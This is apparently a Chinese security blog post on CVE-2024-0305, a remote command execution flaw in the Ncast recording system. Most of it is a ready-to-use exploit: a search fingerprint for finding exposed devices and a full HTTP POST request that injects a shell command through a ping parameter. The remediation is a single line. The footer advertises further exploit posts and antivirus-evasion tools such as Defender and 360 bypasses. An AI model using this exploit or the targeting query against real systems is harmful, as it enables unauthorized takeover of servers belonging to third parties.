叮~你有新的速递!CVE-2024-0305 RCE漏洞(附EXP)
叮~你有新的速递!CVE-2024-0305 RCE漏洞(附EXP)
冯宝宝 哪都通安全 2024-01-20 21:43
0x01 前言
Ncast盈可视高清智能录播系统
存在RCE漏洞
,攻击者可以利用此漏洞执行任意命令
,执行任意命令
,通过该漏洞可以获取服务器权限
。
0x02 影响平台
Ncast 平台
0x03 漏洞复现
搜索语法
icon_hash="-1253433910"
页面
是这个酱紫
EXP如下:
POST /classes/common/busiFacade.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 98
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
Suc
c
e
ss~
0x04 修复方案
建议及时更新至最新版本!
往期推荐
▶
【漏洞系列】叮~你有新的速递!某软RCE漏洞(附EXP)
【漏洞系列】叮~你有新的速递!某友-OA信息泄露登录后台(附EXP)
▶
【漏洞系列】叮~你有新的速递!CVE-2023-33246 RCE漏洞(附EXP)
【漏洞系列】叮~你有新的速递!CNVD-2023-08743漏洞(附PoC)
叮~你有新的速递!CVE-2023-29922漏洞(附脚本)
【漏洞系列】叮~你有新的速递!CVE-2023-22480漏洞(附EXP)
【漏洞系列】
叮~你有新的速递!CVE-2023-25135漏洞(附EXP)
▶
【漏洞系列】叮~你有新的速递!CVE-2023-27524漏洞利用Tools
【漏洞系列】叮~你有新的速递!Citrix CVE-2023-3519 RCE漏洞(附PoC)
▶
【免杀系列】New免杀工具NPS更新5.21(附下载)
▶
【免杀系列】TQL!最新Bypass360核晶与Defender免杀(附下载)
▶
【免杀系列】Bypass | mimikatz的N种利用Tools包含一些免杀方法(附下载)
▶
【免杀系列】New一款红队免杀生成Tools(附下载)
【移动安全】踩坑 | Fiddler雷电模拟器4.0无法抓包(超详细)
【移动安全】牛掰!Xposed检测绕过总结
觉得内容不错,就点下
“
赞
”和
“在看
”如侵权请私聊公众号删文